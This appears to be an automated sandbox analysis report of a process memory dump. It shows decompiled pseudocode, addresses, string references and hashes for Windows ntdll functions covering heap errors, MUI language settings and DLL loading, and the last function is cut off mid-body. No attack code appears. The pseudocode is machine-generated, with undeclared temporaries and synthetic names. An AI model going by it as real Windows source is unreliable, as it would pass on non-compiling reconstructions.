                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ac1c67
                                                                                                                          0x00ac1cdc
                                                                                                                          0x00ac1ce5
                                                                                                                          0x00ac1d04
                                                                                                                          0x00ac1d05
                                                                                                                          0x00ac1ce7
                                                                                                                          0x00ac1cfc
                                                                                                                          0x00ac1d01
                                                                                                                          0x00ac1d0b
                                                                                                                          0x00ac1d17
                                                                                                                          0x00ac1d1f
                                                                                                                          0x00ac1d25
                                                                                                                          0x00ac1d30
                                                                                                                          0x00ac1d4f
                                                                                                                          0x00ac1d50
                                                                                                                          0x00ac1d32
                                                                                                                          0x00ac1d47
                                                                                                                          0x00ac1d4c
                                                                                                                          0x00ac1d61
                                                                                                                          0x00ac1d67
                                                                                                                          0x00ac1d68
                                                                                                                          0x00ac1d6e
                                                                                                                          0x00ac1d79
                                                                                                                          0x00ac1d98
                                                                                                                          0x00ac1d99
                                                                                                                          0x00ac1d7b
                                                                                                                          0x00ac1d90
                                                                                                                          0x00ac1d95
                                                                                                                          0x00ac1daa
                                                                                                                          0x00ac1db0
                                                                                                                          0x00ac1db1
                                                                                                                          0x00ac1db7
                                                                                                                          0x00ac1dc2
                                                                                                                          0x00ac1de1
                                                                                                                          0x00ac1de2
                                                                                                                          0x00ac1dc4
                                                                                                                          0x00ac1dd9
                                                                                                                          0x00ac1dde
                                                                                                                          0x00ac1df3
                                                                                                                          0x00ac1df9
                                                                                                                          0x00ac1dfa
                                                                                                                          0x00ac1e00
                                                                                                                          0x00ac1e0a
                                                                                                                          0x00ac1e13
                                                                                                                          0x00ac1e32
                                                                                                                          0x00ac1e33
                                                                                                                          0x00ac1e15
                                                                                                                          0x00ac1e2a
                                                                                                                          0x00ac1e2f
                                                                                                                          0x00ac1e39
                                                                                                                          0x00ac1e4a
                                                                                                                          0x00ac1e02
                                                                                                                          0x00ac1e02
                                                                                                                          0x00ac1e08
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00ac1e08
                                                                                                                          0x00ac1e5b
                                                                                                                          0x00ac1e7a
                                                                                                                          0x00ac1e7b
                                                                                                                          0x00ac1e5d
                                                                                                                          0x00ac1e72
                                                                                                                          0x00ac1e77
                                                                                                                          0x00ac1e95

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                          • API String ID: 0-2897834094
                                                                                                                          • Opcode ID: c51d4c686f2c7beed8d834cb01f47fb8e8d3c1d946aeee498891f9de6af5bfd6
                                                                                                                          • Instruction ID: 7ecbd98c8cb15088cf53c9c0bf2a85bd3d005f6b6ed24b561fb81d0e956fbb86
                                                                                                                          • Opcode Fuzzy Hash: c51d4c686f2c7beed8d834cb01f47fb8e8d3c1d946aeee498891f9de6af5bfd6
                                                                                                                          • Instruction Fuzzy Hash: AF61D632E6464CDFC712EB94E995E3073E4EB05B20B1A803EF50A5B2A3D6209C419B59
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A13D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E00A13D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E00A11B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E00A11B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E00A11B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E00A11B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E00A11B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L00A24620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00A4F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00A51370(_t276, 0x9e4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00A4BB40(0,  &_v68, _t170);
									if(L00A143C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00A4BB40(_t257,  &_v68, _t243);
								if(L00A143C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00A51370(_t278, 0x9e4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L00A24620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00A4F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00A51370(_v16, 0x9e4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00A4BB40(_t262,  &_v68, _t244);
								if(L00A143C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00A51370(_t282, 0x9e4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00A4BB40(_t262,  &_v68, _t201);
							if(L00A143C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L00A24620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E00A4F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E00A51370(_t280, 0x9e4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E00A4BB40(_t267,  &_v68, _t245);
							if(L00A143C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E00A51370(_t284, 0x9e4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E00A4BB40(_t267,  &_v68, _t224);
						if(L00A143C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L00A277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                                          0x00a13d3c
                                                                                                                          0x00a13d42
                                                                                                                          0x00a13d44
                                                                                                                          0x00a13d46
                                                                                                                          0x00a13d49
                                                                                                                          0x00a13d4c
                                                                                                                          0x00a13d4f
                                                                                                                          0x00a13d52
                                                                                                                          0x00a13d55
                                                                                                                          0x00a13d58
                                                                                                                          0x00a13d5b
                                                                                                                          0x00a13d5f
                                                                                                                          0x00a13d61
                                                                                                                          0x00a13d66
                                                                                                                          0x00a68213
                                                                                                                          0x00a68218
                                                                                                                          0x00a14085
                                                                                                                          0x00a14088
                                                                                                                          0x00a1408e
                                                                                                                          0x00a14094
                                                                                                                          0x00a1409a
                                                                                                                          0x00a140a0
                                                                                                                          0x00a140a6
                                                                                                                          0x00a140a9
                                                                                                                          0x00a140af
                                                                                                                          0x00a140b6
                                                                                                                          0x00a140bd
                                                                                                                          0x00a140bd
                                                                                                                          0x00a13d83
                                                                                                                          0x00a6821f
                                                                                                                          0x00a68229
                                                                                                                          0x00a68238
                                                                                                                          0x00a68238
                                                                                                                          0x00a6823d
                                                                                                                          0x00a6823d
                                                                                                                          0x00a13da0
                                                                                                                          0x00a13daf
                                                                                                                          0x00a13db5
                                                                                                                          0x00a13dba
                                                                                                                          0x00a13dba
                                                                                                                          0x00a13dd4
                                                                                                                          0x00a13e94
                                                                                                                          0x00a13eab
                                                                                                                          0x00a13f6d
                                                                                                                          0x00a13f84
                                                                                                                          0x00a1406b
                                                                                                                          0x00a1406b
                                                                                                                          0x00a1406e
                                                                                                                          0x00a1406e
                                                                                                                          0x00a14070
                                                                                                                          0x00a14074
                                                                                                                          0x00a68351
                                                                                                                          0x00a68351
                                                                                                                          0x00a1407a
                                                                                                                          0x00a1407f
                                                                                                                          0x00a6835d
                                                                                                                          0x00a68370
                                                                                                                          0x00a68377
                                                                                                                          0x00a68379
                                                                                                                          0x00a6837c
                                                                                                                          0x00a6837c
                                                                                                                          0x00a6835d
                                                                                                                          0x00000000
                                                                                                                          0x00a1407f
                                                                                                                          0x00a13f8a
                                                                                                                          0x00a13f8d
                                                                                                                          0x00a13f90
                                                                                                                          0x00a13f95
                                                                                                                          0x00a6830d
                                                                                                                          0x00a6830f
                                                                                                                          0x00a13f9b
                                                                                                                          0x00a13fac
                                                                                                                          0x00a13fae
                                                                                                                          0x00a13fb1
                                                                                                                          0x00a13fb1
                                                                                                                          0x00a13fb6
                                                                                                                          0x00a68317
                                                                                                                          0x00a6831a
                                                                                                                          0x00000000
                                                                                                                          0x00a13fbc
                                                                                                                          0x00a13fc1
                                                                                                                          0x00a13fc9
                                                                                                                          0x00a13fd7
                                                                                                                          0x00a13fda
                                                                                                                          0x00a13fdd
                                                                                                                          0x00a14021
                                                                                                                          0x00a14021
                                                                                                                          0x00a14029
                                                                                                                          0x00a14030
                                                                                                                          0x00a14044
                                                                                                                          0x00a14046
                                                                                                                          0x00a14046
                                                                                                                          0x00a14044
                                                                                                                          0x00a14049
                                                                                                                          0x00a68327
                                                                                                                          0x00a68334
                                                                                                                          0x00a68339
                                                                                                                          0x00a6833c
                                                                                                                          0x00a1404f
                                                                                                                          0x00a1404f
                                                                                                                          0x00a1404f
                                                                                                                          0x00a14051
                                                                                                                          0x00a14056
                                                                                                                          0x00a14063
                                                                                                                          0x00a14063
                                                                                                                          0x00a14068
                                                                                                                          0x00000000
                                                                                                                          0x00a14068
                                                                                                                          0x00a13fdf
                                                                                                                          0x00a13fe2
                                                                                                                          0x00a13fe4
                                                                                                                          0x00a13fe7
                                                                                                                          0x00a13fef
                                                                                                                          0x00a14003
                                                                                                                          0x00a14005
                                                                                                                          0x00a14005
                                                                                                                          0x00a1400c
                                                                                                                          0x00a14013
                                                                                                                          0x00a14016
                                                                                                                          0x00a14017
                                                                                                                          0x00a1401b
                                                                                                                          0x00a1401e
                                                                                                                          0x00000000
                                                                                                                          0x00a1401e
                                                                                                                          0x00a13fb6
                                                                                                                          0x00a13eb1
                                                                                                                          0x00a13eb4
                                                                                                                          0x00a13eb7
                                                                                                                          0x00a13ebc
                                                                                                                          0x00a682a9
                                                                                                                          0x00a682ab
                                                                                                                          0x00a13ec2
                                                                                                                          0x00a13ed3
                                                                                                                          0x00a13ed5
                                                                                                                          0x00a13ed8
                                                                                                                          0x00a13ed8
                                                                                                                          0x00a13edd
                                                                                                                          0x00a682b3
                                                                                                                          0x00a682b6
                                                                                                                          0x00000000
                                                                                                                          0x00a13ee3
                                                                                                                          0x00a13ee8
                                                                                                                          0x00a13eed
                                                                                                                          0x00a13ef0
                                                                                                                          0x00a13ef3
                                                                                                                          0x00a13f02
                                                                                                                          0x00a13f05
                                                                                                                          0x00a13f08
                                                                                                                          0x00a682c0
                                                                                                                          0x00a682c3
                                                                                                                          0x00a682c5
                                                                                                                          0x00a682c8
                                                                                                                          0x00a682d0
                                                                                                                          0x00a682e4
                                                                                                                          0x00a682e6
                                                                                                                          0x00a682e6
                                                                                                                          0x00a682ed
                                                                                                                          0x00a682f4
                                                                                                                          0x00a682f7
                                                                                                                          0x00a682f8
                                                                                                                          0x00a682fc
                                                                                                                          0x00a682ff
                                                                                                                          0x00a682ff
                                                                                                                          0x00a13f0e
                                                                                                                          0x00a13f11
                                                                                                                          0x00a13f16
                                                                                                                          0x00a13f1d
                                                                                                                          0x00a13f31
                                                                                                                          0x00a68307
                                                                                                                          0x00a68307
                                                                                                                          0x00a13f31
                                                                                                                          0x00a13f39
                                                                                                                          0x00a13f48
                                                                                                                          0x00a13f4d
                                                                                                                          0x00a13f50
                                                                                                                          0x00a13f50
                                                                                                                          0x00a13f53
                                                                                                                          0x00a13f58
                                                                                                                          0x00a13f65
                                                                                                                          0x00a13f65
                                                                                                                          0x00a13f6a
                                                                                                                          0x00000000
                                                                                                                          0x00a13f6a
                                                                                                                          0x00a13edd
                                                                                                                          0x00a13dda
                                                                                                                          0x00a13ddd
                                                                                                                          0x00a13de0
                                                                                                                          0x00a13de5
                                                                                                                          0x00a68245
                                                                                                                          0x00a13deb
                                                                                                                          0x00a13df7
                                                                                                                          0x00a13dfc
                                                                                                                          0x00a13dfe
                                                                                                                          0x00a13e01
                                                                                                                          0x00a13e01
                                                                                                                          0x00a13e06
                                                                                                                          0x00a6824d
                                                                                                                          0x00a6824f
                                                                                                                          0x00a68254
                                                                                                                          0x00000000
                                                                                                                          0x00a13e0c
                                                                                                                          0x00a13e11
                                                                                                                          0x00a13e16
                                                                                                                          0x00a13e19
                                                                                                                          0x00a13e29
                                                                                                                          0x00a13e2c
                                                                                                                          0x00a13e2f
                                                                                                                          0x00a6825c
                                                                                                                          0x00a6825f
                                                                                                                          0x00a68261
                                                                                                                          0x00a68264
                                                                                                                          0x00a6826c
                                                                                                                          0x00a68280
                                                                                                                          0x00a68282
                                                                                                                          0x00a68282
                                                                                                                          0x00a68289
                                                                                                                          0x00a68290
                                                                                                                          0x00a68293
                                                                                                                          0x00a68294
                                                                                                                          0x00a68298
                                                                                                                          0x00a6829b
                                                                                                                          0x00a6829b
                                                                                                                          0x00a13e35
                                                                                                                          0x00a13e38
                                                                                                                          0x00a13e3d
                                                                                                                          0x00a13e44
                                                                                                                          0x00a13e58
                                                                                                                          0x00a682a3
                                                                                                                          0x00a682a3
                                                                                                                          0x00a13e58
                                                                                                                          0x00a13e60
                                                                                                                          0x00a13e6f
                                                                                                                          0x00a13e74
                                                                                                                          0x00a13e77
                                                                                                                          0x00a13e77
                                                                                                                          0x00a13e7a
                                                                                                                          0x00a13e7f
                                                                                                                          0x00a13e8c
                                                                                                                          0x00a13e8c
                                                                                                                          0x00a13e91
                                                                                                                          0x00000000
                                                                                                                          0x00a13e91

                                                                                                                          Strings
                                                                                                                          • Kernel-MUI-Language-SKU, xrefs: 00A13F70
                                                                                                                          • WindowsExcludedProcs, xrefs: 00A13D6F
                                                                                                                          • Kernel-MUI-Language-Allowed, xrefs: 00A13DC0
                                                                                                                          • Kernel-MUI-Language-Disallowed, xrefs: 00A13E97
                                                                                                                          • Kernel-MUI-Number-Allowed, xrefs: 00A13D8C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                          • API String ID: 0-258546922
                                                                                                                          • Opcode ID: 759017d714f72292cf8b3f3a4e3b7a35502a5ae30b4b5f6923c72412301c1d89
                                                                                                                          • Instruction ID: 2c9d4493c1b067844727f4bee09f89d5c3a20d8626b25e6293cb21766512a1c5
                                                                                                                          • Opcode Fuzzy Hash: 759017d714f72292cf8b3f3a4e3b7a35502a5ae30b4b5f6923c72412301c1d89
                                                                                                                          • Instruction Fuzzy Hash: 08F14D76D00618EFCF11DFA9CA80AEEBBB9FF48750F14016AE505AB251D7349E41CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A38E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 44%
                                                                                                                          			E00A38E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0xafd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0xaf8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0xaf5780 & 0x00000003) != 0) {
							E00A85510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0xaf5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E00A4B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0xaf7984; // 0x4d2ba0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0xaf8464; // 0x74790110
					 *0xafb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E00A39B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0xaf5780 & 0x00000005) != 0) {
						_push(_t49);
						E00A85510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                          0x00a38e0f
                                                                                                                          0x00a38e16
                                                                                                                          0x00a38e19
                                                                                                                          0x00a38e1b
                                                                                                                          0x00a38e21
                                                                                                                          0x00a38e7f
                                                                                                                          0x00a38e85
                                                                                                                          0x00a79354
                                                                                                                          0x00a7936c
                                                                                                                          0x00a79371
                                                                                                                          0x00a7937b
                                                                                                                          0x00a79381
                                                                                                                          0x00a79381
                                                                                                                          0x00a7937b
                                                                                                                          0x00a38e9d
                                                                                                                          0x00a38e9d
                                                                                                                          0x00a38e29
                                                                                                                          0x00a38e2c
                                                                                                                          0x00a38e38
                                                                                                                          0x00a38e3e
                                                                                                                          0x00a38e43
                                                                                                                          0x00a38eb5
                                                                                                                          0x00a38eb9
                                                                                                                          0x00a792aa
                                                                                                                          0x00a792af
                                                                                                                          0x00a792e8
                                                                                                                          0x00a792e8
                                                                                                                          0x00a792af
                                                                                                                          0x00a38eb9
                                                                                                                          0x00a38e45
                                                                                                                          0x00a38e53
                                                                                                                          0x00a38e5b
                                                                                                                          0x00a38e5f
                                                                                                                          0x00a38e78
                                                                                                                          0x00a38e78
                                                                                                                          0x00a38e7d
                                                                                                                          0x00a38ec3
                                                                                                                          0x00a38ecd
                                                                                                                          0x00a38ed2
                                                                                                                          0x00a38ed2
                                                                                                                          0x00a38ec5
                                                                                                                          0x00a38ec5
                                                                                                                          0x00000000
                                                                                                                          0x00a38e7d
                                                                                                                          0x00a38e67
                                                                                                                          0x00a38ea4
                                                                                                                          0x00a7931a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a79320
                                                                                                                          0x00a38ea4
                                                                                                                          0x00a38e70
                                                                                                                          0x00a79325
                                                                                                                          0x00a79340
                                                                                                                          0x00a79345
                                                                                                                          0x00a79345
                                                                                                                          0x00a38e76
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          • LdrpFindDllActivationContext, xrefs: 00A79331, 00A7935D
                                                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 00A7933B, 00A79367
                                                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 00A79357
                                                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 00A7932A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                          • API String ID: 0-3779518884
                                                                                                                          • Opcode ID: d93e0887b7b21c2575632d124299afced7251d19b80723371e41d73f30d32392
                                                                                                                          • Instruction ID: dabbf38c1daea3367c9e0516563664c8ef3b809126f66831bd81d05fad1a5af0
                                                                                                                          • Opcode Fuzzy Hash: d93e0887b7b21c2575632d124299afced7251d19b80723371e41d73f30d32392
                                                                                                                          • Instruction Fuzzy Hash: A4412A32E003159FDF35AB58CC89A76B7B5BB54748F25856AF814571A1EF78EC80C381
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A18794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E00A18794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00A1934A() != 0) {
								_t159 = E00A8A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xaf5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00A85510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xaf5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00A1849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
